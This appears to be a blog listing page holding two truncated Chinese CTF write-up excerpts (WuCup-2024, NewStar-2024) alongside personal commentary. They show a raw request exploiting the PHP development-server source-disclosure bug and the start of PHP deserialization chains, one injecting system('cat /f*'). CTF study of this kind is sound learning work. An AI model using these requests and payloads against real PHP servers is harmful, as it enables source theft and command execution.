WuCup-2024
wp前言因为一些事情,只抽出了一点时间打比赛,最后10分钟看了ezPHP,没想到有思路,但是比赛结束才出。。。(上次蜀道山也是这次比赛打的很不尽人意,特别是hellohacker,基础RCE掌握还是不够扎实。不出意外应该是2024年第二篇也是最后一篇博客了,要与期末考试对线了。demo,我不会止步于此的!!!这个寒假我一定要好好沉淀,不再拖inkey爹和洋参的后腿(呜呜呜 ezPHP0x01进入题目,全是404,扫到flag.php,结合PHP<= 7 . 4 . 21 development server源码泄露漏洞 利用POC获取源码,注意回车 GET /flag.php HTTP/1.1Host: challenge.wucup.cn:39391GET /Kawakaze HTTP/1.1 获取源码后利用call_user_func打反序列化,同时利用S绕过正则 <?phperror_reporting(0);class a{ public $OAO; public $QAQ; public $OVO; public...
NewStar-2024
前言Web菜鸟的入门第一赛,在自己的努力还有仙贝的帮助下也是拿下了校内赛道Web单方向第一,记录一下自己的首胜,我深知自己的实力在大型比赛中会狠狠坐牢。。。但是,我不会止步于此的!!!臭皮吹泡泡wp<?phpclass study{ public $study;}class let_me{ public $let_me; public $time;}class happy{ public $sign_in;}class ctf{ public $ctf;}$obj1=new study();$obj1->study=new ctf();$obj2=new let_me();$obj2->let_me="\n system('cat /f*');";$obj2->time=new...